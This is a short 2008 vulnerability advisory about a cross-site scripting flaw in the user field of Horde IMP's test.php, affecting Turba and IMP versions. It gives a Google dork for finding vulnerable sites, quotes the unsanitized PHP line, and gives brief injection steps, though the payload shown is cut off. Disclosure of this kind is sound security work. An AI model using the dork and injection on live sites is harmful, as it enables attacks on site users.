+======================================================================================================+ + Horde & Turba Contact Manager & XSS Vulnerabilities and Remote Java's File Inclusion + +======================================================================================================+ Author(s): Ivan Sanchez Product: Turba Contact Manager Web: http://www.horde.org/turba/ Turba is the Horde contact management application. It is a production level address book, and makes heavy use of the Horde framework to provide integration with IMP and other Horde applications. Date: 14/09/2008 ---- Version Affected: ----------------- Download : http://ftp.horde.org/pub/turba/turba-h3-2.2.1.tar.gz Others. * Turba H3 (2.2.1) (final) * turba-h3.1.1 * IMP: H3 (4.2) * IMP: H3 (4.1) * IMP: 4.1-cvs * IMP: H3 (4.1.6) * IMP: H3 (4.1.3) * IMP: 3.2.2 Google Dork: ------------ inurl:"/imp/test.php?" Evil Function: -------------- http://site/horde/imp/test.php? Internal Variables: ------------------- 1-Download Turba H3 (2.2.1) (final)and audit the internal code , So We can see ..... 2-View the internal file-line. File(test.php) Lines: 92/94 $user = isset($_POST['user']) ? $_POST['user'] : ''; // 'user'; Then- First Exploit: ------------- Insert evil XSS , Remote Java's File into "texbox" (User) Server ok Protocol ok (e.g. "imap" or "imap/notls") Port ok (defaults to "143") User <---------------------------------- 'user'= "> Password ok Remediation: ------------ Sanitized all parameters- Thx. NULL CODE SERVICES [ www.nullcode.com.ar ] Hunting Security Bugs! +======================================================================================================+ + Horde & Turba Contact Manager & XSS Vulnerabilities and Remote Java's File Inclusion + +======================================================================================================+